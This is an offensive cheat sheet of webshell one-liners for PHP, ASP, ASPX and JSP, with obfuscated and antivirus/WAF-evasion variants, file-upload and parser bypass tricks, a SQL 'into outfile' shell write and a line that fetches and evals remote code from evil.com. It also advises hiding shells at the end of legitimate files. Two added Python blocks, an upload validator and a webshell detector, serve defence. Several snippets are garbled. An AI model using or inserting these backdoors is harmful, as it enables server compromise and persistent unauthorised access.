## PHP one-line webshells

### Basic forms

The classic eval form:

```php
<?php @eval($_POST['cmd']);?>
```

assert with error suppression (before PHP 7 the name can be split up):

```php
<?php @assert($_POST['cmd']);?>
```

$_REQUEST accepts both GET and POST parameters:

```php
<?php @eval($_REQUEST['cmd']);?>
```

system runs an OS command directly:

```php
<?php system($_REQUEST['cmd']);?>
```

Conditional execution (can be appended to the end of a legitimate file):

```php
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
```

### Variant and obfuscated forms

Dynamic function call:

```php
<?php ($_=@$_GET[1]).@$_($_POST[1])?>
```

Variable function (passwords c and cc):

```php
<?$_POST['c']($_POST['cc']);?>
```

Variable function with two arguments:

```php
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
```

Short-tag forms:

script tag bypass (evades filtering on `<?`):

```php
<script language="php">@eval($_POST['cmd'])</script>
```

Backticks run a system command:

```php
<?php echo `$_GET['cmd']` ?>
```

### Encoded variants

assert built by string concatenation:

```php
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["cmd"]); ?>
```

Built with str_replace:

```php
<?php $a = str_replace("x","","axsxxsxexrxxt");$a($_POST["cmd"]); ?>
```

Built by reversing a string:

```php
<?php $a="TR"."Es"."sA"; $b=strtolower($a); $c=strrev($b); @$c($_POST['cmd']); ?>
```

Function name decoded from base64:

```php
<?php $a=base64_decode("YXNzZXJ0"); @$a($_POST['cmd']); ?>
```

Variable variables:

```php
<?php $bb="assert"; $a='bb'; $$a($_POST['cmd']);?>
```

parse_str variable parsing:

```php
<?php $str="a=eval";parse_str($str);$a($_POST['cmd']);?>
```

Further variants (create_function, array_map, call_user_func, call_user_func_array, array_filter):

```php
<?php $func =create_function('',$_REQUEST['cmd']); $func(); ?>
<?php $func=$_GET['func']; $cmd=$_GET['cmd']; $array[0]=$cmd; $new_array=array_map($func,$array); ?>
<?php @call_user_func(assert,$_GET['cmd']); ?>
<?php $cmd=$_GET['cmd']; $array[0]=$cmd; call_user_func_array("assert",$array); ?>
<?php $cmd=$_GET['cmd']; $array1=array($cmd); $func =$_GET['func']; array_filter($array1,$func); ?>
```

usort callback, only usable on PHP < 5.6:

```php
<?php usort($_GET,'asse'.'rt');?>
```

usort with the spread operator, only usable on PHP >= 5.6:

```php
<?php usort(...$_GET);?>
```

Assorted short forms:

```php
<?php eval($_POST[1]);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST[1]);?>
<?php ($_=@$_GET[1]).@$_($_POST[1])?>
<?php @eval_r($_POST[1])?>
<?php assert($_POST[1]);?>
<?php $a = $_POST['c']; $a($_POST['cc']);?>
<?php $a = $_POST['c']; $a($_POST['cc'],$_POST['cc'])?>
```

preg_replace with the /e modifier, called with the POST parameter `h=@eval_r($_POST[1]);`:

```php
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>
```

Backtick and script-tag forms:

```php
<?php echo `$_GET['r']` ?>
<script language="php">@eval_r($_POST[sb])</script>
```

```
<?php (])?>
```

The line above evades AV and scanners. Few people online use it. It can be inserted at the very bottom of any ASP file on the site without causing an error, for example inside index.asp.

```php
<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system ($_REQUEST[1]);?>
```

A PHP one-liner with a check added; on the same principle as the ASP one-liner above, it can be inserted at the very bottom of any PHP file without causing an error.

```asp
<%execute request("class")%><%'<% loop <%:%><%'<% loop <%:%><%execute request ("class")%><%execute request("class")'<% loop <%:%>
```

For use when there is no anti-download table; if there is an anti-download table, try inserting the following statement to get past it:

```asp
<%eval(request("1")):response.end%>
```

For backup use.

### Callback-function forms

create_function anonymous function (PHP 5 and 7):

```php
<?php $st=@create_function('',$_POST['cmd']);$st();?>
```

call_user_func callback:

```php
<?php @call_user_func('assert',$_GET['cmd']);?>
```

call_user_func_array callback:

```php
<?php call_user_func_array('assert', array($_REQUEST['cmd']));?>
```

array_map (requires the func and cmd parameters):

```php
<?php array_map($_GET['func'], array($_GET['cmd']));?>
```

array_filter:

```php
<?php array_filter(array($_GET['cmd']), $_GET['func']);?>
```

usort sort callback (PHP < 5.6):

```php
<?php usort($_GET,'asse'.'rt');?>
```

usort with the spread operator (PHP >= 5.6):

```php
<?php usort(...$_GET);?>
```

### Regex-replacement forms

preg_replace with the /e modifier (PHP 5 only):

```php
<?php @preg_replace('/.*/e',$_POST['cmd'],'');?>
```

preg_filter with the /e modifier (PHP 5 only):

```php
<?php @preg_filter('/.*/e',$_POST['cmd'],'');?>
```

mb_ereg_replace with the ee option (PHP 5 and 7):

```php
<?php @mb_ereg_replace('.*',$_POST['cmd'],'','ee');?>
```

mb_eregi_replace with the ee option:

```php
<?php @mb_eregi_replace('.*',$_POST['cmd'],'','ee');?>
```

### Advanced bypass forms

filter_var callback (bypasses D盾 (D Shield) and 安全狗 (SafeDog)):

```php
<?php filter_var($_REQUEST['cmd'], FILTER_CALLBACK, array('options' => 'assert'));?>
```

filter_var_array callback:

```php
<?php filter_var_array(array('test' => $_REQUEST['cmd']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));?>
```

Deferred execution with register_shutdown_function (requires the e parameter):

```php
<?php $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['cmd']);?>
```

PDO SQLite callback (requires the e parameter):

```php
<?php
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['cmd']));
?>
```

Direct SQLite3 call (PHP 5.3+):

```php
<?php
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['cmd'], SQLITE3_TEXT);
$stmt->execute();
?>
```

Custom function wrapper:

```php
<?php function fun($a){ @eval($a); } @fun($_POST['cmd']); ?>
```

Class wrapper (bypasses D盾):

```php
<?php
class create{
    public $cmd = '';
    public function __construct(){
        $this->cmd = $_POST['cmd'];
        @eval($this->cmd);
    }
}
$a = new create();
?>
```

### AV-evasion combinations

base64_decode + eval (needs a matching 菜刀 (China Chopper) client configuration):

```php
<?php if($_POST['x']!=''){$a="base64_decode"; eval($a($_POST['z0']));}?>
```

substr + md5 check before execution:

```php
<?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['cmd']);?>
```

Complex obfuscation (password -7):

```php
<?php @$_="s"."s"."e"."r"; @$_="a".$_."t"; @$_(${"_P"."OS"."T"}[0-2-5]);?>
```
## ASP one-line webshells

### Basic forms

The simplest execute form:

```asp
<%execute request("cmd")%>
```

execute with parentheses:

```asp
<%execute(request("cmd"))%>
```

eval form:

ExecuteGlobal:

```asp
<%ExecuteGlobal request("cmd")%>
```

### Variant and obfuscated forms

Assign to a variable, then execute:

```asp
<%a=request("cmd")%><%eval a%>
```

Split form (the two parts can be inserted at different locations):

```asp
<%Y=request("cmd")%><%execute(Y)%>
```

Conditional form (harder to spot):

```asp
<%if request("cmd")<>""then session("cmd")=request("cmd"):end if:if session("cmd")<>"" then execute session("cmd")%>
```

### Encoded forms

chr-encoded parameter name (password p):

```asp
<%eval(Request(chr(112)))%>
```

chr-encoded parameter name (password #):

```asp
<%eval request(chr(35))%>
```

Built by character concatenation:

```asp
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%>
```

### Alternative-tag forms

VBScript script tag:

```asp
<script language=VBScript runat=server>execute request("cmd")</script>
```

VBS script tag with eval:

```asp
<script language=vbs runat=server>eval(request("cmd"))</script>
```

### Protection-bypass forms

Bypasses 护卫神 (split tags):

```asp
<%E=request("cmd")%>abc123456789<%execute E%>
```

With an error-handling statement (can be appended to the end of a file):

```asp
<%On Error Resume Next execute request("cmd")%>
```

Conditional check to avoid errors:

```asp
<%if request("cmd")<>""then execute request("cmd")%>
```

Reverse concatenation (password -7):

```asp
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
```

For backup use:

```asp
<%eval(request("cmd")):response.end%>
```

## ASPX one-line webshells

### Basic forms

Standard JScript form:

```aspx
<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
```

With the validateRequest attribute:

```aspx
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["cmd"],"unsafe"));%>
```

### Encoded and obfuscated forms

base64-decoded execution:

```aspx
<%popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));%>
```

Obfuscated (password -7):

```aspx
<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
```

### C# form

WebAdmin backdoor (password webadmin):

```aspx
<script language="C#" runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>
```

## JSP one-line webshells

### Basic execution

Runtime.exec of a system command:

```jsp
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
```

With a password check (password 023):

```jsp
<%if("023".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){ out.println(new String(b)); }
    out.print("</pre>");
}%>
```

### File-write form

File upload:

```jsp
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
```

### Other

Writing a webshell with MySQL:

```sql
select '<?php @eval($_POST[cmd]);?>' into outfile 'C:/Inetpub/wwwroot/1.php'
```
## Upload bypass techniques

### Client-side bypass

Remove or disable the JavaScript validation:

```text
Use the browser developer tools to delete the onsubmit handler
Or send the request directly with Burp Suite, skipping the client-side validation
```

### Extension bypass

#### Blacklist bypass

Common blacklisted extensions:

```text
php/php2/php3/php4/php5/phtml/pwml/inc
asp/aspx/ascx/jsp/cfm/cfc/pl/bat/exe/com
dll/vbs/js/reg/cgi/htaccess/.user.ini/asis
sh/shtml/shm/phtm
```

#### .htaccess parsing

Condition: Apache server

```apache
AddHandler php5-script .jpg
AddType application/x-httpd-php .jpg
```

Or target a specific file:

```apache
<FilesMatch "muma.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
```

#### .user.ini configuration file

Condition: the current directory contains a PHP file

```ini
auto_prepend_file=shell.jpg
```

#### Null-byte (%00) truncation

Condition: PHP < 5.3.4 with magic_quotes_gpc=OFF

```text
upload.php?path=uploads/shell.php%00.jpg
```

#### Double-write bypass

When the server strips sensitive words:

```text
shell.pphphp -> shell.php (after filtering)
```

### File-content bypass

#### Crafting image webshells

GIF89a header:

```text
GIF89a
<?php eval($_POST['cmd']);?>
```

PNG header:

```text
\x89PNG\r\n\x1a\n
<?php eval($_POST['cmd']);?>
```

JPG header:

```text
\xff\xd8\xff
<?php eval($_POST['cmd']);?>
```

#### Short-tag use

```php
<?= eval($_POST['cmd']); ?>
<? eval($_POST['cmd']); ?>
```

### Parsing vulnerabilities

#### Apache parsing vulnerability

Condition: Apache 1.x/2.2.x

```text
test.php.a.b -> parsed as PHP
Extensions are checked from right to left; an unrecognized extension is skipped and the check moves one step left
```

#### IIS parsing vulnerabilities

IIS 6.0:

```text
test.asp;.jpg -> parsed as ASP
test.asp/1.jpg -> parsed as ASP
```

IIS 7.0/7.5:

```text
test.jpg/.php -> parsed as PHP (the file must exist)
```

#### Nginx parsing vulnerability

Older Nginx versions:

```text
test.jpg/1.php -> parsed as PHP
test.jpg%00.php -> parsed as PHP
```

### MIME-type bypass

Modify the Content-Type header:

```text
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
```

### Case bypass

Windows file names are case-insensitive:

```text
shell.Php
shell.PHp
shell.pHP
```
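Every trick in the upload-bypass and parsing sections above targets a weak server-side check. As an added example (not code from the original page), the following Python validator rejects each catalogued filename form and checks the file bytes instead of the client's Content-Type; the function name `check_upload`, the allowlist and the magic-byte table are assumptions made for the example.

```python
import re

# Server-side upload validation (added example, not from the original page).
# The client's Content-Type header is never consulted; names and allowlist are assumed.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
# PHP long/short tags, the <script language="php"> form, and ASP/JSP <% tags.
EMBEDDED_CODE = re.compile(rb"<\?(?:php|=)?|<script\s+language\s*=\s*['\"]?php|<%", re.I)

def check_upload(filename: str, data: bytes):
    """Return (accepted, reason) for an uploaded file name and its raw bytes."""
    name = filename.replace("\\", "/").split("/")[-1]       # drop any path component
    if "\x00" in name or "%00" in name:                      # %00 truncation
        return False, "null byte in filename"
    if ";" in name or ":" in name:                           # test.asp;.jpg, shell.php::$DATA
        return False, "';' or ':' in filename"
    if name.startswith("."):                                 # .htaccess, .user.ini
        return False, "dotfiles are not accepted"
    parts = name.lower().split(".")                          # lower-case first: shell.PHp
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "exactly one extension required (blocks test.php.a.b)"
    ext = parts[1]
    if ext not in ALLOWED_EXT:                               # allowlist, not a blacklist
        return False, f"extension '{ext}' not allowed"
    if not data.startswith(MAGIC[ext]):                      # claimed type vs real bytes
        return False, "content does not match the image type"
    if EMBEDDED_CODE.search(data):                           # GIF89a + <?php image webshell
        return False, "script tags embedded in image data"
    # Accepted files should still be stored under a server-chosen random name
    # outside the web root, and ideally re-encoded to strip trailing data.
    return True, "ok"

if __name__ == "__main__":
    for fn, blob in [("shell.php%00.jpg", b""), ("test.asp;.jpg", b""),
                     ("muma.gif", b"GIF89a <?php eval($_POST['cmd']);?>"),
                     ("photo.jpg", b"\xff\xd8\xff\xe0" + bytes(16))]:
        print(fn, "->", check_upload(fn, blob))
```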
## AV-evasion techniques

### Code-level evasion

#### Function-name splitting

```php
<?php
$a = 'as'.'se'.'rt';
$a($_POST['cmd']);
?>
```

#### Variable overwrite

```php
<?php
$a = 'eval';
$$a = $_POST['cmd'];
$eval();
?>
```

#### Encoding obfuscation

Base64 encoding:

```php
<?php
$code = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');
eval($code);
?>
```

Hex encoding:

```php
<?php
$func = "\x65\x76\x61\x6c";
$func($_POST['cmd']);
?>
```

#### Comment obfuscation

```php
<?php eval($_POST['cmd']); ?>
```

#### XOR construction

```php
<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');
$___=$$__;
$_($___[_]);
?>
```

### File-level evasion

#### File inclusion

Main file:

```php
<?php include('config.jpg'); ?>
```

config.jpg:

```php
<?php eval($_POST['cmd']); ?>
```

#### Split storage

Split the webshell across several files:

```php
<?php
$a = 'ev';
$b = 'al';
$c = $a.$b;
$c($_POST['cmd']);
?>
```

#### Using OS features

Windows alternate data streams:

```text
shell.php:stream.txt
shell.php::$DATA
```

#### Hidden files

Linux hidden files:

### WAF bypass

#### Parameter splitting

```php
<?php eval($_POST['a'].$_POST['b']); ?>
```

#### Using HTTP headers

```php
<?php eval($_SERVER['HTTP_USER_AGENT']); ?>
```

#### Encoding bypass

URL encoding:

Unicode encoding:

```php
<?php $func = "\u0065\u0076\u0061\u006c"; ?>
```

### Combined evasion examples

A heavily obfuscated one-liner:

```php
<?php
class S{
    public $v;
    function __construct($c){ $this->v=$c; }
    function __destruct(){
        $a='e'.'v'.'a'.'l';
        $a($this->v);
    }
}
$s=new S($_POST['cmd']);
?>
```

Using reflection:

```php
<?php $r = new ReflectionFunction('assert'); $r->invoke($_POST['cmd']); ?>
```

Dynamic loading:

```php
<?php $f = file_get_contents('http://evil.com/shell.txt'); eval($f); ?>
```
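The PHP one-liner families at the top of the page and the code-level evasion tricks in this section share a small set of structural traits (a request superglobal fed to eval/assert, callback functions, /e and ee regex options, name-building by concatenation or decoding, XOR strings). This added Python detector (not code from the original page) encodes those traits as regex signatures and runs them over constructed samples; the signature names and the `scan`/`is_suspicious` helpers are assumptions made for the example.

```python
from __future__ import annotations
import re

# Heuristic signatures for the one-liner families catalogued on this page.
# Added example, not code from the original page: a triage aid, so expect
# some false positives (array_map/usort over request data can be benign).
SG = r"\$_(?:POST|GET|REQUEST|SERVER|COOKIE)"
SIGNATURES = {
    "direct-exec": re.compile(r"\b(?:eval|assert|system|passthru|shell_exec)\s*\(\s*@?" + SG),
    "variable-func": re.compile(r"\$\w+(?:\[[^\]]*\])?\s*\(\s*@?" + SG),
    "callback-exec": re.compile(r"\b(?:call_user_func(?:_array)?|array_map|array_filter|usort|"
                                r"register_shutdown_function|create_function)\s*\([^;]*" + SG),
    "filter-callback": re.compile(r"\bfilter_var(?:_array)?\s*\([^;]*FILTER_CALLBACK"),
    "preg-e-modifier": re.compile(r"\bpreg_(?:replace|filter)\s*\(\s*['\"]/[^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
    "mb-ereg-ee": re.compile(r"\bmb_eregi?_replace\s*\([^;]*['\"]ee['\"]"),
    "backtick-exec": re.compile(r"`[^`\n]*" + SG + r"[^`\n]*`"),
    "script-tag": re.compile(r"<script\s+language\s*=\s*['\"]?php", re.I),
    "concat-name": re.compile(r"['\"][a-zA-Z]{1,4}['\"]\s*\.\s*['\"][a-zA-Z]{1,4}['\"]"),
    "decode-then-call": re.compile(r"\b(?:base64_decode|str_replace|strrev|strtolower|str_rot13|gzinflate)"
                                   r"\s*\([^;]*\)\s*;\s*@?(?:eval|assert|\$\w+)\s*\("),
    "xor-string": re.compile(r"['\"][^'\"]*['\"]\s*\^\s*['\"]"),
    "reflection": re.compile(r"new\s+ReflectionFunction\s*\("),
    "remote-load": re.compile(r"\bfile_get_contents\s*\(\s*['\"]https?://"),
}

def scan(source: str) -> list[str]:
    """Return the sorted names of every signature that matches the PHP source."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(source))

def is_suspicious(source: str) -> bool:
    return bool(scan(source))

# Constructed samples: one benign handler and three variants taken from this page.
SAMPLES = {
    "benign": "<?php\n$name = htmlspecialchars($_POST['name'] ?? '');\necho 'Hello, ' . $name;\n",
    "classic": "<?php @eval($_POST['cmd']);?>",
    "str_replace": '<?php $a = str_replace("x","","axsxxsxexrxxt");$a($_POST["cmd"]); ?>',
    "preg_e": "<?php @preg_replace('/.*/e',$_POST['cmd'],'');?>",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(f"{label:12s} -> {', '.join(scan(src)) or 'clean'}")
```

Matches are leads for manual review, not verdicts; pair the scan with file-integrity monitoring of the web root, since several page variants (XOR, variable variables) deliberately leave no literal function name to match.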